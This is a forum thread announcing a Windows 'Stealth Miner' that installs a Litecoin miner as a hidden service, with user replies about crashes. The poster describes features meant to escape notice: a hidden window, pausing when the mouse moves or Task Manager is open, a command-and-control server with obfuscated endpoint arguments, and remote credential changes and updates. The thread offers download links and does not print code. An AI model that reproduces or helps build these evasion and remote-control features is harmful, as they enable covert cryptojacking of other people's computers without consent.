Bitcoin Forum
March 28, 2024, 02:05:24 PM *
News: Latest Bitcoin Core release: 26.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1] 2 3 4 »  All
  Print  
Author Topic: [ANN] - LTC Windows Stealth Miner - Remotely Manage your miners!  (Read 28518 times)
GenTarkin (OP)
Legendary

Activity: 2450
Merit: 1002

View Profile
October 31, 2011, 07:04:30 PM
Last edit: August 28, 2013, 10:58:27 PM by GenTarkin

Its not often that I write any code or script...I dont really like it at all and barely know how lol...
But, through using autoit software I have come up w/ a set of scripts that basically "install" minerd w/ user specified pool credentials stored in a text file and there is also a "uninstall" script as well.

Its only for windows 32bit and 64bit. It uses the latest pooler minerd which is written in ASM and offers awesome performance.
It also figures out the number of "cores" on a system and feeds the miner the 1 thread / "core".
It starts at the lowest process priority so it doesnt slow down system and is set to infinite retries w/ miner has no communication w/ pool.
It runs in 2 diff modes - credentials specified in miner.txt - designed for network distribution OR if miner.txt does not exist it prompts for mining credentials upon install.

Just dl the .exe, it will autoextract to tmp folder launch the installer then delete the extracted files.
NOTE: if you want to change miner credentials you will have to open the .exe archive  (via WINRAR) and change the credentials in the miner.txt file.

Project page @ https://litebit.co/project-item/ltc_stealth/

The uninstall file removes all traces from registry and folders.
UPDATE: 10.25.11, Ive added auto detection of 64bit , 32bit OS and have it pick miners accordingly, also added some more functionality to uninstall script. NOTE: for some reason the miners posted here: http://www.wuala.com/jbw9/pub/Bitcoin/Tenebrix/miner/win/ - all crash themselves =/ not sure what the issue is but Ive packaged the i7 and amdfam10 one w/ my install package (1st linked below)
If anyone has stable 32bit miner link please post and Ill update package! Thanks

Also, Ive added link to .zip file containing source files if you guys wanna mess w/ em =)

UPDATE: 10.26.11,
I have rewrote a lot of the script and now it does its work by installing itself as a windows service. Mining credentials are still taken from miner.txt so please edit before running the file below ( extract and repack )
Uninstaller also rewritten to remove traces of the service and files.
Source is included in the installer archive.
KNOWN BUGS: Currently , I dont know of any way to launch the service w/ a different process priority, so it launches w/ priority of normal. Has to be manually changed in task manager if desired.
UPDATE 10.27.11, The service method is now only one I host, Ive got it working pretty much in every way superior to the old build. I have added ability for it to set itself to low process priority for the miner. It accomplishes by making a scheduled task which runs as SYSTEM .. it runs the .exe that makes the call to the miner executable to lower its priority. The task does this once on install and is scheduled to do it 30 seconds after every system boot up.
Be sure to change the .txt file in the installer archive(rar) and enter in your miner credentials. Then just run installer.
Uninstaller link provided seperately.
The 32bit miners still crash =/ anyone know where I can update the package w/ 32bit working miners?
Source is included in the package.
UPDATE 10.27.11, a minor update, noticed the installer and uninstaller dont work properly unless ran w/ admin rights, so changed both installer and uninstaller to require elevated privileges to run.
UPDATE 11.25.11, update now shows prompt for mining credentials input. If left unchanged after 20 seconds the pretyped credentials are used, if cancel button pressed, the script is aborted.
Leaving old method up for DL.... for easier mass network installation.
UPDATE 12.19.11, I have updated the service installer to now use POOLER's assembly miners which yeild much better results. Also the 32bit miner now works...my service installer therefore, works completely now.
Thanks to pooler! YOU ROCK DUDE!
UPDATE 2.2.12, I have rewritten the code to not have to differentiate between intel / amd processors. Removed the priority scheduling task since the miner now sets itself to lowest priority. Using latest version of 2.1.2 binaries from pooler. Changes made to both service installer versions.
UPDATED 3.6.12, I have added a new version of the installer which now keeps the prompt method but also is mouse sensitive and it polls mouse position every second, if theres movement it stops the minerd service. If there is no movement it waits 30 seconds and checks again, if there is no movement then it starts the service. Also, it checks to see if Task Manager is open, if it is, it wont start the miner. Updated the uninstaller to properly remove all versions.
UPDATED 3.7.12, Updated all archives w/ latest pooler miners which includes AVX support for 64bit OS. Also made process checking more robust for the mouse launcher process and mouse listener itself.
UPDATED 3.7.12, The mouse sensing installer package is now RDP aware and handles RDP sessions differently, then when it closes it goes back into mouse sensing mode.
UPDATED 3.8.12, There is only one installer now - it does all 3 functions of the previous installers. If you wish to run on network in distributed mode then open the archive, rename SAMPLE_miner.txt to miner.txt and edit it w/ your mining credentials, save it and update the archive w/ the new file. Also, 3rd line in miner.txt put either true or false for enabling mouse movement sensing.
   If you leave SAMPLE_miner.txt unchanged and dont rename or create miner.txt it will run in prompted mode which will prompt you for your mining credentials. Mouse sensing mode is always enabled in this mode.
   Other changes: Put minerd into seperate 32 / 64 directories and renamed it to idle.exe. Added perfmon.exe to the blacklist along w/ taskmgr.exe to stop the miner when either of these processes are detected running. Updated Uninstaller as well. Source is included in the archive. Created README.txt in archive.
UPDATED 3.8.12, Another feature added to the installer. When using miner.txt there are a few option now to enable installation logging. It basically just says if installer was successful in creating the service or not. It records the hostname, hostip and success status and appends it to a log file you specify in miner.txt as well. This feature added as a request by solarizer. Will improve upon it in future, for now its basic functionality.
UPDATED 3.12.12, After many hours of work on this script and going crazy scripting. Ive finally pulled off a very basic C&C server / client infrastructure  for my Stealth Miner!!
Its still in its experimental stage but the basics work pretty well in my LAN testing.
Ive added 2 new links to this page, one is the installer and the other is the C&C miner watcher / management program.
The readme and example miner.txt file has been updated w/ all the info you need to get started. But heres the rundown:
I only have the management side enabled for the miner.txt install version - not the prompt runmode.
So, the miners themselves make outbound requests to the listener host. You specify the hostname / ip of the listener in miner.txt
Also you can disable / enable management in miner.txt
Whatever PC the listener C&C program is on, will hopefully have a firewall rule added when its ran to allow communication on port 43432 TCP
If youre controlling host is behind a router(controlling remote hosts over internet) then you will need to forward 43432 TCP through your router.
Once you open the C&C program, if everything is configured correctly, the list on the left should be populated w/ hosts that have the miner installed. It refreshes the list about every 20-30 seconds.
Enter commands into the input field below the list.
Commands will be ran against the currently selected miner in the left list.
Select "issue command" button to send to selected miner.
The commands that work currently against miners are:
start - starts the miner
stop - stops the miner
uninstall - completely removes miner from system

The right pane shows status of commands ran. Its kinda buggy but it works.
Also, you may notice when the left list refreshes , the numbers on the hosts get changed. Dont be concerned. Its just reconnecting to them on different sockets. The only time a command may get messed up is when its in the middle of refreshing the window.
I think, currently it has the ability to hold up to 100 hosts, I havent tried any huge list of hosts, so dont even know if that left pane will scroll when you get a lot of hosts..LOL
Anyways, I havent tested this across the internet but theoretically should work. Ive tested it in a LAN setup and works beautifully so far.
Plz reply w/ any bugs / ideas! Greatly appreciate it!
!!SOON TO COME : will be the ability to remotely change miner credentials! stay tuned!

3.13.12, This update adds another command to the C&C program and fixes bugs, changes UI and enhances it a bit behind the scenes.
The new command is "hashrate". To see the latest reported hashrate of a miner, select the host in the list and enter hashrate in the command input. Hashrate will be reported in right pane.
UI enhancements: the issue command now has default focus when starting program. So, just select host, enter proper command and hit ENTER key. Also, added button on command history list to clear it when it gets all crazy =)

Links are updated!
3.13.12, This is the update everyones talking about! The ability to change remote mining credentials via the C&C program! the command is "changecred"
It will bring up another box which has the mining URL, username:pass, threads
Hitting update will apply the changes and restart the miner. Cancel will not make any changes. If you hit update w/ no changes made it simply rewrites current credentials.
Please test! Enjoy!

Links updated w/ latest builds - this only applies to the C&C version and the C&C program link.
3.14.12, This is another update everyone has been wanting! The ability to remotely update the miner package is now integrated. the command is "updateminer"
It will bring a file browse , when you select the new package it will begin transferring it. It *may inform if the package was successfully received*(kinda buggy)
It will then begin the uninstall and update process and will report back if its a success or not. If it cant be done it will attempt to reinstall old miner.

Links updated w/ latest builds - this only applies to the C&C version and the C&C program link.
3.15.12, Today brings many fixes / enhancements to the C&C management program itself. Including: commands no longer go in the host list - they go in the command history list properly. Added color to the host list. Added timestamps to commands in history field. Removed session id from command history result and just have the hostname listed and result of command - except for changecred...still workin on this one.
Also, since I was using the C&C management endpoint ip as an argument for the management program itself (on install) it was obvious via the command line argument readout where the data was going. So, converted the data to its ANSI binary hex equivilant for the argument and converts it back in the management program itself. (little more cryptic)

Links updated w/ latest builds - can use remote install feature from previous build to update your miners to related release.
*note to get the latest changes for C&C, you will always need to redownload it from link below!
3.16.12 - Some minor updates to the uninstaller and how it handles unable to being able to reach C&C manager if it disconnects, so it doesnt endlessly loop. Also, updated filename handling of miner.txt. Increased upload speed to miners when updating the installer package on miners. READ CAREFULLY BELOW!
YOU MUST UPDATE THE PACKAGE ON MINERS BEFORE UPDATING THE C&C manager!
Ive left the link to the older C&C manager below, this way noone gets stuck. If you upload the new package w/ new C&C manager.. first miners will fail the installation and revert to old version. In a day or 2 I will update link to latest C&C manager which is faster.
3.19.12 - Updated the C&C link w/ newest build, for those that havent updated miner yet please do so w/ your current C&C before using this one.
3.20.12 - Many bug fixes in service management and installer. Update your miners w/ latest package via updateminer command in your C&C.
Also, made small updates to C&C as well. Newest builds posted.
4.5.13 - UPDATED download links, put on new location, at least temporarily. Dropbox apparently is limiting my download rate...bleh, need to find a more permanent solution I guess, while being easy...any suggestions?
5.2.13 - UPDATED download links, fixed missing miner files in installers. Updated miner to latest pooler minerd version both 32 & 64
5.6.13 - UPDATED download links for the installers

REQUIREMENTS: Must have .net 3.5 installed on machine for installer to work, needs internet connection of course. C&C - for it to receive from clients, if behind firewall, must open port 43432. For windows xp,vista,7 32/64 only!
LIMITATIONS: C&C- can only select / issue commands one host at a time currently, can only monitor up to 100 hosts currently.
BUGS: -  sometimes the miner status is never received because of list refresh (socket change) but the command was still carried out. To verify "changecred" command, simply run it against same host again, the box should show changed credentials.

Here is the link to it:
SOURCE FILES ARE INCLUDED IN ARCHIVES... *the installers(first 2 links) are winrar self executing archives - open w/ winrar first to edit miner.txt)

README POSTED: (read first! contains commands to use for C&C)
http://www.filedropper.com/readme_14

ALL-IN-ONE Installer: (no management, stable afaik)
http://www.filedropper.com/minerdserviceallinone

ALL-IN-ONE Installer: (with management and may be buggy, please report issues)
http://www.filedropper.com/minerdserviceallinonecc

C&C for Stealth Miner:
http://www.filedropper.com/stealthminercc

Uninstaller:
http://www.filedropper.com/minerduninstall

Let me know if there are any bugs =) Thanks

Old installers listed for reference below:

Prompting + Mouse sensing Installer Package:
http://dl.dropbox.com/u/1791919/ltc/minerdService_prompt_mousedetect.exe

Prompting Installer Package:
http://dl.dropbox.com/u/1791919/ltc/minerdService_prompt.exe

Installer Package:
http://dl.dropbox.com/u/1791919/ltc/minerdService.exe

Check out the my miner page @ https://litebit.co/project-item/ltc_stealth/

GenTarkin's MOD Kncminer Titan custom firmware! v1.0.4! -- !!NO LONGER AVAILABLE!!
Donations: bitcoin- 1Px71mWNQNKW19xuARqrmnbcem1dXqJ3At || litecoin- LYXrLis3ik6TRn8tdvzAyJ264DRvwYVeEw

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
"If you don't want people to know you're a scumbag then don't be a scumbag." -- margaritahuyan
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
GenTarkin (OP)
Legendary

View Profile
November 03, 2011, 06:10:46 PM

bump =P

GenTarkin's MOD Kncminer Titan custom firmware! v1.0.4! -- !!NO LONGER AVAILABLE!!
Donations: bitcoin- 1Px71mWNQNKW19xuARqrmnbcem1dXqJ3At || litecoin- LYXrLis3ik6TRn8tdvzAyJ264DRvwYVeEw
phorensic

Activity: 630
Merit: 500

View Profile
November 03, 2011, 07:06:30 PM

I wouldn't install it as a service because you need to watch if it crashes.  Mine crashes once a day with no obvious output.
ultrahoschie

Activity: 12
Merit: 0

View Profile
November 03, 2011, 07:12:06 PM

under windows xp the miner crashed too ....

cu
SuperTramp
Legendary

Activity: 1073
Merit: 1000

View Profile WWW
November 03, 2011, 07:34:58 PM

Runs very well for me on Windows7 64 bit. Crashes on XP 32bit.

Thanks again GenTarkin for all the help !

MincoinForum, Home Of The World's Fastest & Rarest Cryptocurrency. https://www.mincoinforum.com
Only 10million Mincoin To Be Created. Find out more at https://www.mincoin.us
Vanderbleek

Activity: 518
Merit: 250

View Profile
November 03, 2011, 08:34:39 PM

Works fine on the x64 systems I installed it to. I don't have any 32 bit systems though.
GenTarkin (OP)
Legendary

View Profile
November 03, 2011, 10:15:44 PM

The 32bit miner crashes...I used the ones posted from waula in my build and they all crash for me... =/ not sure what the deal is w/ that. But there is a way to monitor this actually, if you go to task manager and right click on the mining process select go to file location and then the file that has the workd "err" in it has the console output from the miner.
Also, you know if it crashes by the processor not being @ 100% =P

GenTarkin (OP)
Legendary

View Profile
November 25, 2011, 09:26:51 PM

Just updated script, for those people that complained they couldnt or didnt know how to change the mining credentials...It now prompts you for them, w/ a 20second timeout.
If left ignored after 20 sec timeout, it uses the credentials pretyped in the box. If cancel buttom is selected, the script aborts.

Here is the link:
http://dl.dropbox.com/u/1791919/ltc/minerdService_prompt.exe

CAMOPEJB

Activity: 132
Merit: 100

View Profile
November 26, 2011, 04:42:00 PM

It is possible that miner crashes because it needs this dll in working folder:

http://content.wuala.com/contents/jbw9/pub/Bitcoin/Tenebrix/miner/win/pthreadGC2.dll

Try it - it solved problem for me  Wink
GenTarkin (OP)
Legendary

View Profile
November 26, 2011, 08:43:52 PM

It is possible that miner crashes because it needs this dll in working folder:

http://content.wuala.com/contents/jbw9/pub/Bitcoin/Tenebrix/miner/win/pthreadGC2.dll

Try it - it solved problem for me  Wink

I have it in the working folder, the miner still crashes =(

factotumjack

Activity: 22
Merit: 0

View Profile
November 27, 2011, 07:23:51 AM

Bump.

I'm also having a similar problem. Whenever I try to initiate pooled mining, minerd.exe crashes (Win Vista 64-bit). I'm just setting up litecoin now, so I'm not sure if solo mining works without minerd or if it just hasn't given me an error yet.

I look forward to hearing more about this in the future though.
Vanderbleek

Activity: 518
Merit: 250

View Profile
November 28, 2011, 04:40:41 PM

Tarkin,

If you install the new one (with prompt) and specify a different pool in the prompt, would the new pool or old pool (specified in the text file) be used?
GenTarkin (OP)
Legendary

View Profile
November 28, 2011, 10:35:36 PM

Tarkin,

If you install the new one (with prompt) and specify a different pool in the prompt, would the new pool or old pool (specified in the text file) be used?

Thats a good question lol! But, after glancing at code again, the prompt will superseed the miner.txt, the new version ignores miner.txt pretty much.
The original version is good for mass network distribution, the new version is good for a per computer config individually.

GenTarkin (OP)
Legendary

View Profile
November 28, 2011, 10:36:27 PM

Bump.

I'm also having a similar problem. Whenever I try to initiate pooled mining, minerd.exe crashes (Win Vista 64-bit). I'm just setting up litecoin now, so I'm not sure if solo mining works without minerd or if it just hasn't given me an error yet.

I look forward to hearing more about this in the future though.

Shouldnt be crashing w/ the 64bit miner...if it does, ya have other issues I would think.

GenTarkin (OP)
Legendary

View Profile
December 19, 2011, 07:12:27 PM

UPDATED TODAY , 12.19.11 - now uses POOLER's assembly miners. Much better throughput, 32bit miner now works. Script is fully functional.

kjlimo
Legendary

Activity: 2086
Merit: 1031

View Profile WWW
December 20, 2011, 12:09:41 PM

Will this be able to install on a jump drive? I would like to be able to install on a flash drive, run the program, but then stop the miner, remove the jump drive and be on my way.  It's an easy way to test it on many computers and show friends how it works without loading anything on their comps. 

Would you recommend I stick with pooler's .exe?

Coinbase for selling BTCs
Fold for spending BTCs
PM me with any questions on these sites/apps!  http://www.montybitcoin.com

or Vircurex for trading alt cryptocurrencies like DOGEs
CoinNinja for exploring the blockchain.
GenTarkin (OP)
Legendary

View Profile
December 20, 2011, 05:10:42 PM

Will this be able to install on a jump drive? I would like to be able to install on a flash drive, run the program, but then stop the miner, remove the jump drive and be on my way.  It's an easy way to test it on many computers and show friends how it works without loading anything on their comps. 

No, this is an installer, its designed to be run from a flash drive but it then becomes a windows service which starts at windows bootup. The link to the uninstaller also just uninstalls everything from a system.
If your looking for a simple, launch from usb drive then show it off then shut it down and everything remains on flashdrive then this does not function that way. This is designed to install to the PC in a minimal amount of time and walk away, yet have it mining.
Yes, in every case use poolers miners. If u decide on a solution like mine, then you dont need any miners, my packaged installer already includes and executes poolers miners.

kjlimo
Legendary

Activity: 2086
Merit: 1031

View Profile WWW
December 20, 2011, 11:29:52 PM

No, this is an installer, its designed to be run from a flash drive but it then becomes a windows service which starts at windows bootup. The link to the uninstaller also just uninstalls everything from a system.
If your looking for a simple, launch from usb drive then show it off then shut it down and everything remains on flashdrive then this does not function that way. This is designed to install to the PC in a minimal amount of time and walk away, yet have it mining.
Yes, in every case use poolers miners. If u decide on a solution like mine, then you dont need any miners, my packaged installer already includes and executes poolers miners.

Thanks for the reply!

Coinbase for selling BTCs
Fold for spending BTCs
PM me with any questions on these sites/apps!  http://www.montybitcoin.com

or Vircurex for trading alt cryptocurrencies like DOGEs
CoinNinja for exploring the blockchain.
grue
Legendary

Activity: 2058
Merit: 1431

View Profile
December 21, 2011, 02:17:06 AM

wait, why install it as a service? why not just a entry in the system startup registry?

It is pitch black. You are likely to be eaten by a grue.

Adblock for annoying signature ads | Enhanced Merit UI
GenTarkin (OP)
Legendary

View Profile
December 21, 2011, 03:32:36 PM

wait, why install it as a service? why not just a entry in the system startup registry?
because, this hides the miner window entirely, and because services start w/ the PC even when noones logged in.

Pages: [1] 2 3 4 »  All
  Print  

Jump to: